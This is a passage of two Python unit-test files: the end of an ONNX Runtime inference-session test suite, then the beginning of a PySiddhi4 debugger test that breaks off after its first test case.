output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array([b"this", b"is", b"identity", b"test"]).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype("|S8"))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
x = np.array(["this", "is", "identity", "test"], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"), providers=available_providers_without_tvm)
# numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
# so we use inputs where that is the case
x = np.array([b"must", b"have", b"same", b"size"], dtype=np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "tensor(string)")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(string)")
res = sess.run([output_name], {x_name: x})
expr = np.array([["must", "have"], ["same", "size"]], dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), providers=onnxrt.get_available_providers())
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {"input:0": a})
self.assertTrue("Model requires 2 inputs" in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path, providers=onnxrt.get_available_providers())
modelmeta = sess.get_modelmeta()
self.assertEqual("onnx-caffe2", modelmeta.producer_name)
self.assertEqual("squeezenet_old", modelmeta.graph_name)
self.assertEqual("", modelmeta.domain)
self.assertEqual("", modelmeta.description)
self.assertEqual("", modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {"X": x})
profile_file = sess.end_profiling()
tags = ["pid", "dur", "ts", "ph", "X", "name", "args"]
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue("[" in lines[0])
for i in range(1, len(lines) - 1):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue("]" in lines[-1])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(
opt.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED,
)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt, providers=available_providers)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {"input1:0": a, "input:0": b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"), providers=available_providers_without_tvm)
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, "seq(tensor(float))")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "tensor(int64)")
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(
get_name("sequence_construct.onnx"),
providers=available_providers_without_tvm,
)
self.assertEqual(sess.get_inputs()[0].type, "tensor(int64)")
self.assertEqual(sess.get_inputs()[1].type, "tensor(int64)")
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "seq(tensor(int64))")
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)),
]
res = sess.run(
[output_name],
{
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3)),
},
)
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(
get_name("sequence_insert.onnx"),
sess_options=opt,
providers=available_providers_without_tvm,
)
self.assertEqual(sess.get_inputs()[0].type, "seq(tensor(int64))")
self.assertEqual(sess.get_inputs()[1].type, "tensor(int64)")
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, "seq(tensor(int64))")
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run(
[output_name],
{
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": [],
},
)
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ["ORT_LOAD_CONFIG_FROM_MODEL"] = str(1)
sess = onnxrt.InferenceSession(
get_name("model_with_valid_ort_config_json.onnx"),
providers=onnxrt.get_available_providers(),
)
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(
session_options.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL
) # default option (not from the ORT config)
self.assertEqual(
session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL,
) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ["ORT_LOAD_CONFIG_FROM_MODEL"] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(
get_name("abs_free_dimensions.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
sess = onnxrt.InferenceSession(
get_name("abs_free_dimensions.onnx"),
sess_options=so,
providers=onnxrt.get_available_providers(),
)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# "Dim1" and "Dim2" have values assigned to them.
self.assertEqual(input_shape, [4, 6, 5])
def testSessionOptionsAddConfigEntry(self):
so = onnxrt.SessionOptions()
key = "CONFIG_KEY"
val = "CONFIG_VAL"
so.add_session_config_entry(key, val)
self.assertEqual(so.get_session_config_entry(key), val)
def testInvalidSessionOptionsConfigEntry(self):
so = onnxrt.SessionOptions()
invalide_key = "INVALID_KEY"
with self.assertRaises(RuntimeError) as context:
so.get_session_config_entry(invalide_key)
self.assertTrue(
"SessionOptions does not have configuration with key: " + invalide_key in str(context.exception)
)
def testSessionOptionsAddInitializer(self):
# Create an initializer and add it to a SessionOptions instance
so = onnxrt.SessionOptions()
# This initializer is different from the actual initializer in the model for "W"
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(
np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)
)
# The user should manage the life cycle of this OrtValue and should keep it in scope
# as long as any session that is going to be reliant on it is in scope
so.add_initializer("W", ortvalue_initializer)
# Create an InferenceSession that only uses the CPU EP and validate that it uses the
# initializer provided via the SessionOptions instance (overriding the model initializer)
# We only use the CPU EP because the initializer we created is on CPU and we want the model to use that
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so, providers=["CPUExecutionProvider"])
res = sess.run(
["Y"],
{"X": np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)},
)
self.assertTrue(
np.array_equal(
res[0],
np.array([[2.0, 2.0], [12.0, 12.0], [30.0, 30.0]], dtype=np.float32),
)
)
def testSessionOptionsAddExternalInitializers(self):
# Create an external initializer data in OrtValue
# This initializer will replace the initializer with external data reference in the graph
ortvalue_initializer = onnxrt.OrtValue.ortvalue_from_numpy(np.array([0, 0, 1, 1]).astype(np.int64))
so = onnxrt.SessionOptions()
so.add_external_initializers(["Pads_not_on_disk"], [ortvalue_initializer])
# This should not throw
onnxrt.InferenceSession(
get_name("model_with_external_initializer_come_from_user.onnx"),
sess_options=so,
providers=["CPUExecutionProvider"],
)
def testRegisterCustomOpsLibrary(self):
if sys.platform.startswith("win"):
shared_library = "custom_op_library.dll"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
elif sys.platform.startswith("darwin"):
shared_library = "libcustom_op_library.dylib"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
else:
shared_library = "./libcustom_op_library.so"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_op_library", "custom_op_test.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
so1 = onnxrt.SessionOptions()
so1.register_custom_ops_library(shared_library)
# Model loading successfully indicates that the custom op node could be resolved successfully
sess1 = onnxrt.InferenceSession(custom_op_model, sess_options=so1, providers=available_providers_without_tvm)
# Run with input data
input_name_0 = sess1.get_inputs()[0].name
input_name_1 = sess1.get_inputs()[1].name
output_name = sess1.get_outputs()[0].name
input_0 = np.ones((3, 5)).astype(np.float32)
input_1 = np.zeros((3, 5)).astype(np.float32)
res = sess1.run([output_name], {input_name_0: input_0, input_name_1: input_1})
output_expected = np.ones((3, 5)).astype(np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
# Create an alias of SessionOptions instance
# We will use this alias to construct another InferenceSession
so2 = so1
# Model loading successfully indicates that the custom op node could be resolved successfully
sess2 = onnxrt.InferenceSession(custom_op_model, sess_options=so2, providers=available_providers_without_tvm)
# Create another SessionOptions instance with the same shared library referenced
so3 = onnxrt.SessionOptions()
so3.register_custom_ops_library(shared_library)
sess3 = onnxrt.InferenceSession(custom_op_model, sess_options=so3, providers=available_providers_without_tvm)
def testOrtValue(self):
numpy_arr_input = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
numpy_arr_output = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
def test_session_with_ortvalue_input(ortvalue):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=onnxrt.get_available_providers())
res = sess.run(["Y"], {"X": ortvalue})
self.assertTrue(np.array_equal(res[0], numpy_arr_output))
ortvalue1 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input)
self.assertEqual(ortvalue1.device_name(), "cpu")
self.assertEqual(ortvalue1.shape(), [3, 2])
self.assertEqual(ortvalue1.data_type(), "tensor(float)")
self.assertEqual(ortvalue1.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue1)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue1.numpy(), numpy_arr_input))
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
ortvalue2 = onnxrt.OrtValue.ortvalue_from_numpy(numpy_arr_input, "cuda", 0)
self.assertEqual(ortvalue2.device_name(), "cuda")
self.assertEqual(ortvalue2.shape(), [3, 2])
self.assertEqual(ortvalue2.data_type(), "tensor(float)")
self.assertEqual(ortvalue2.is_tensor(), True)
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
# Pass in the constructed OrtValue to a session via Run() and check results
test_session_with_ortvalue_input(ortvalue2)
# The constructed OrtValue should still be valid after being used in a session
self.assertTrue(np.array_equal(ortvalue2.numpy(), numpy_arr_input))
def testOrtValue_ghIssue9799(self):
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
session = onnxrt.InferenceSession(
get_name("identity_9799.onnx"),
providers=onnxrt.get_available_providers(),
)
for seq_length in range(40, 200):
inps = np.ones((seq_length, 16, 7, 5, 3, 3)).astype(np.float32)
ort_val = onnxrt.OrtValue.ortvalue_from_numpy(inps, "cuda", 0)
upstreams_onnxrt = {"input": ort_val}
outs = session.run(output_names=["output"], input_feed=upstreams_onnxrt)[0]
self.assertTrue(np.allclose(inps, outs))
def testSparseTensorCooFormat(self):
cpu_device = onnxrt.OrtDevice.make("cpu", 0)
shape = [9, 9]
values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
# Linear indices
indices = np.array([3, 5, 15], dtype=np.int64)
sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, values, indices, cpu_device)
self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
self.assertEqual(sparse_tensor.dense_shape(), shape)
self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
self.assertEqual(sparse_tensor.device_name(), "cpu")
# Get Data View on a numeric type.
values_ret = sparse_tensor.values()
self.assertFalse(values_ret.flags.writeable)
indices_ret = sparse_tensor.as_coo_view().indices()
self.assertFalse(indices_ret.flags.writeable)
# Run GC to test that values_ret still exhibits expected data
gc.collect()
self.assertTrue(np.array_equal(values, values_ret))
self.assertTrue(np.array_equal(indices, indices_ret))
# Test new Ortvalue interfaces
ort_value = onnxrt.OrtValue.ort_value_from_sparse_tensor(sparse_tensor)
sparse_tensor = ort_value.as_sparse_tensor()
values_ret = sparse_tensor.values()
self.assertFalse(values_ret.flags.writeable)
indices_ret = sparse_tensor.as_coo_view().indices()
self.assertFalse(indices_ret.flags.writeable)
gc.collect()
# Test string data on cpu only, need to subst values only
str_values = np.array(["xyz", "yxz", "zyx"], dtype=str)
str_sparse_tensor = onnxrt.SparseTensor.sparse_coo_from_numpy(shape, str_values, indices, cpu_device)
self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_COO)
self.assertEqual(str_sparse_tensor.dense_shape(), shape)
self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
self.assertEqual(str_sparse_tensor.device_name(), "cpu")
# Get string values back
str_values_ret = str_sparse_tensor.values()
self.assertTrue(np.array_equal(str_values, str_values_ret))
# Check indices
str_indices_ret = str_sparse_tensor.as_coo_view().indices()
gc.collect()
self.assertFalse(str_indices_ret.flags.writeable)
self.assertTrue(np.array_equal(indices, str_indices_ret))
cuda_device = onnxrt.OrtDevice.make("cuda", 0)
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
# Test to_cuda
copy_on_cuda = sparse_tensor.to_cuda(cuda_device)
self.assertEqual(copy_on_cuda.dense_shape(), shape)
self.assertEqual(copy_on_cuda.data_type(), "sparse_tensor(float)")
self.assertEqual(copy_on_cuda.device_name(), "cuda")
# Test that gpu copy would fail to copy to cuda
with self.assertRaises(RuntimeError):
copy_on_cuda.to_cuda(cuda_device)
# Test that string tensor copy would fail
with self.assertRaises(RuntimeError):
str_sparse_tensor.to_cuda(cuda_device)
else:
# No cuda available
with self.assertRaises(RuntimeError):
sparse_tensor.to_cuda(cuda_device)
def testSparseTensorCsrFormat(self):
cpu_device = onnxrt.OrtDevice.make("cpu", 0)
shape = [9, 9]
values = np.array([1.0, 2.0, 3.0], dtype=np.float32)
inner_indices = np.array([1, 1, 1], dtype=np.int64)
outer_indices = np.array([0, 1, 2, 3, 3, 3, 3, 3, 3, 3], dtype=np.int64)
sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(
shape, values, inner_indices, outer_indices, cpu_device
)
self.assertEqual(sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(sparse_tensor.dense_shape(), shape)
self.assertEqual(sparse_tensor.data_type(), "sparse_tensor(float)")
self.assertEqual(sparse_tensor.device_name(), "cpu")
# Test CSR(C) indices
inner_indices_ret = sparse_tensor.as_csrc_view().inner()
outer_indices_ret = sparse_tensor.as_csrc_view().outer()
self.assertFalse(inner_indices_ret.flags.writeable)
self.assertFalse(outer_indices_ret.flags.writeable)
gc.collect()
self.assertTrue(np.array_equal(inner_indices, inner_indices_ret))
self.assertTrue(np.array_equal(outer_indices, outer_indices_ret))
# Test with strings
str_values = np.array(["xyz", "yxz", "zyx"], dtype=str)
str_sparse_tensor = onnxrt.SparseTensor.sparse_csr_from_numpy(
shape, str_values, inner_indices, outer_indices, cpu_device
)
self.assertEqual(str_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(str_sparse_tensor.dense_shape(), shape)
self.assertEqual(str_sparse_tensor.data_type(), "sparse_tensor(string)")
self.assertEqual(str_sparse_tensor.device_name(), "cpu")
if "CUDAExecutionProvider" in onnxrt.get_available_providers():
cuda_device = onnxrt.OrtDevice.make("cuda", 0)
cuda_sparse_tensor = sparse_tensor.to_cuda(cuda_device)
self.assertEqual(cuda_sparse_tensor.device_name(), "cuda")
self.assertEqual(cuda_sparse_tensor.format(), onnxrt.OrtSparseFormat.ORT_SPARSE_CSRC)
self.assertEqual(cuda_sparse_tensor.dense_shape(), shape)
self.assertEqual(cuda_sparse_tensor.data_type(), "sparse_tensor(float)")
def testRunModelWithCudaCopyStream(self):
available_providers = onnxrt.get_available_providers()
if not "CUDAExecutionProvider" in available_providers:
print("Skipping testRunModelWithCudaCopyStream when CUDA is not available")
else:
# adapted from issue #4829 for a race condition when copy is not on default stream
# note:
# 1. if there are intermittent failure in this test, something is wrong
# 2. it's easier to repro on slower GPU (like M60, Geforce 1070)
# to repro #4829, set the CUDA EP do_copy_in_default_stream option to False
providers = [
("CUDAExecutionProvider", {"do_copy_in_default_stream": True}),
"CPUExecutionProvider",
]
session = onnxrt.InferenceSession(get_name("issue4829.onnx"), providers=providers)
shape = np.array([2, 2], dtype=np.int64)
for iteration in range(100000):
result = session.run(output_names=["output"], input_feed={"shape": shape})
def testSharedAllocatorUsingCreateAndRegisterAllocator(self):
# Create and register an arena based allocator
# ort_arena_cfg = onnxrt.OrtArenaCfg(0, -1, -1, -1) (create an OrtArenaCfg like this template if you want to use non-default parameters)
ort_memory_info = onnxrt.OrtMemoryInfo(
"Cpu",
onnxrt.OrtAllocatorType.ORT_ARENA_ALLOCATOR,
0,
onnxrt.OrtMemType.DEFAULT,
)
# Use this option if using non-default OrtArenaCfg : onnxrt.create_and_register_allocator(ort_memory_info, ort_arena_cfg)
onnxrt.create_and_register_allocator(ort_memory_info, None)
# Create a session that will use the registered arena based allocator
so1 = onnxrt.SessionOptions()
so1.log_severity_level = 1
so1.add_session_config_entry("session.use_env_allocators", "1")
onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so1,
providers=onnxrt.get_available_providers(),
)
# Create a session that will NOT use the registered arena based allocator
so2 = onnxrt.SessionOptions()
so2.log_severity_level = 1
onnxrt.InferenceSession(
get_name("mul_1.onnx"),
sess_options=so2,
providers=onnxrt.get_available_providers(),
)
def testMemoryArenaShrinkage(self):
if platform.architecture()[0] == "32bit" or "ppc" in platform.machine() or "powerpc" in platform.machine():
# on x86 or ppc builds, the CPU allocator does not use an arena
print("Skipping testMemoryArenaShrinkage in 32bit or powerpc platform.")
else:
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess1 = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=["CPUExecutionProvider"])
input_name = sess1.get_inputs()[0].name
# Shrink CPU memory after execution
ro1 = onnxrt.RunOptions()
ro1.add_run_config_entry("memory.enable_memory_arena_shrinkage", "cpu:0")
self.assertEqual(
ro1.get_run_config_entry("memory.enable_memory_arena_shrinkage"),
"cpu:0",
)
sess1.run([], {input_name: x}, ro1)
available_providers = onnxrt.get_available_providers()
if "CUDAExecutionProvider" in available_providers:
sess2 = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=available_providers)
input_name = sess2.get_inputs()[0].name
# Shrink CPU and GPU memory after execution
ro2 = onnxrt.RunOptions()
ro2.add_run_config_entry("memory.enable_memory_arena_shrinkage", "cpu:0;gpu:0")
self.assertEqual(
ro2.get_run_config_entry("memory.enable_memory_arena_shrinkage"),
"cpu:0;gpu:0",
)
sess2.run([], {input_name: x}, ro2)
def testCheckAndNormalizeProviderArgs(self):
from onnxruntime.capi.onnxruntime_inference_collection import check_and_normalize_provider_args
valid_providers = ["a", "b", "c"]
def check_success(providers, provider_options, expected_providers, expected_provider_options):
(
actual_providers,
actual_provider_options,
) = check_and_normalize_provider_args(providers, provider_options, valid_providers)
self.assertEqual(actual_providers, expected_providers)
self.assertEqual(actual_provider_options, expected_provider_options)
check_success(None, None, [], [])
check_success(["a"], None, ["a"], [{}])
check_success(["a", "b"], None, ["a", "b"], [{}, {}])
check_success([("a", {1: 2}), "b"], None, ["a", "b"], [{"1": "2"}, {}])
check_success(["a", "b"], [{1: 2}, {}], ["a", "b"], [{"1": "2"}, {}])
with self.assertWarns(UserWarning):
check_success(["a", "b", "a"], [{"x": 1}, {}, {"y": 2}], ["a", "b"], [{"x": "1"}, {}])
def check_failure(providers, provider_options):
with self.assertRaises(ValueError):
check_and_normalize_provider_args(providers, provider_options, valid_providers)
# disable this test
# provider not valid
# check_failure(["d"], None)
# providers not sequence
check_failure(3, None)
# providers value invalid
check_failure([3], None)
# provider_options not sequence
check_failure(["a"], 3)
# provider_options value invalid
check_failure(["a"], ["not dict"])
# providers and provider_options length mismatch
check_failure(["a", "b"], [{1: 2}])
# provider options unsupported mixed specification
check_failure([("a", {1: 2})], [{3: 4}])
def testRegisterCustomEPsLibrary(self):
from onnxruntime.capi import _pybind_state as C
available_eps = C.get_available_providers()
# skip amd gpu build
if "kRocmExecutionProvider" in available_eps:
return
if sys.platform.startswith("win"):
shared_library = "test_execution_provider.dll"
elif sys.platform.startswith("darwin"):
# exclude for macos
return
else:
shared_library = "./libtest_execution_provider.so"
if not os.path.exists(shared_library):
raise FileNotFoundError("Unable to find '{0}'".format(shared_library))
this = os.path.dirname(__file__)
custom_op_model = os.path.join(this, "testdata", "custom_execution_provider_library", "test_model.onnx")
if not os.path.exists(custom_op_model):
raise FileNotFoundError("Unable to find '{0}'".format(custom_op_model))
session_options = C.get_default_session_options()
sess = C.InferenceSession(session_options, custom_op_model, True, True)
sess.initialize_session(
["my_ep"],
[
{
"shared_lib_path": shared_library,
"device_id": "1",
"some_config": "val",
}
],
set(),
)
print("Create session with customize execution provider successfully!")
if __name__ == "__main__":
unittest.main(verbosity=1)
|
TestDebugger.py
|
# Copyright (c) 2017, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
#
# WSO2 Inc. licenses this file to you under the Apache License,
# Version 2.0 (the "License"); you may not use this file except
# in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import logging
logging.basicConfig(level=logging.INFO)
import time
from time import sleep
from unittest.case import TestCase
from PySiddhi4.core.SiddhiManager import SiddhiManager
from PySiddhi4.core.debugger.SiddhiDebugger import SiddhiDebugger
from PySiddhi4.core.debugger.SiddhiDebuggerCallback import SiddhiDebuggerCallback
from PySiddhi4.core.stream.output.StreamCallback import StreamCallback
from Tests.Util.AtomicInt import AtomicInt
import threading
class TestDebugger(TestCase):
def setUp(self):
self.inEventCount = AtomicInt(0)
self.debugEventCount = AtomicInt(0)
def getCount(self, event):
count = 0
while event != None:
count += 1
event = event.getNext()
return count
def test_Debugger1(self):
logging.info("Siddi Debugger Test 1: Test next traversal in a simple query")
siddhiManager = SiddhiManager()
cseEventStream = "@config(async = 'true') " \
"define stream cseEventStream (symbol string, price float, volume int);"
query = "@info(name = 'query 1') from cseEventStream select symbol, price, volume insert into OutputStream; "
siddhiAppRuntime = siddhiManager.createSiddhiAppRuntime(cseEventStream + query)
_self_shaddow = self
class StreamCallbackImpl(StreamCallback):
def receive(self, events):
_self_shaddow.inEventCount.addAndGet(len(events))
siddhiAppRuntime.addCallback("OutputStream", StreamCallbackImpl()) # Causes GC Error
inputHandler = siddhiAppRuntime.getInputHandler("cseEventStream")
siddhiDebugger = siddhiAppRuntime.debug()
siddhiDebugger.acquireBreakPoint("query 1", SiddhiDebugger.QueryTerminal.IN)
class SiddhiDebuggerCallbackImpl(SiddhiDebuggerCallback):
def debugEvent(self, event, queryName, queryTerminal, debugger):
logging.info("Query: " + queryName + ":" + queryTerminal.name)
logging.info(event)
count = _self_shaddow.debugEventCount.addAndGet(_self_shaddow.getCount(event))
if count == 1:
_self_shaddow.assertEquals("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 2:
_self_shaddow.assertEqual("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 50.0, 60], event.getOutputData(),
"Incorrect debug event received at OUT")
elif count == 3:
_self_shaddow.assertEqual("query 1IN", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at IN")
elif count == 4:
_self_shaddow.assertEquals("query 1OUT", queryName + queryTerminal.name, "Incorrect break point")
_self_shaddow.assertListEqual(["WSO2", 70.0, 40], event.getOutputData(),
"Incorrect debug event received at OUT")
debugger.next()
siddhiDebugger.setDebuggerCallback(SiddhiDebuggerCallbackImpl())
inputHandler.send(["WSO2", 50.0, 60])
inputHandler.send(["WSO2", 70.0, 40])
sleep(0.1)
self.assertEquals(2, _self_shaddow.inEventCount.get(), "Invalid number of output events")
self.assertEquals(4, _self_shaddow.debugEventCount.get(), "Invalid number of debug events")
siddhiAppRuntime.shutdown()
siddhiManager.shutdown()
def test_debugger2(self):
logging.info("Siddi Debugger Test 2: Test next traversal in a query with length batch window")
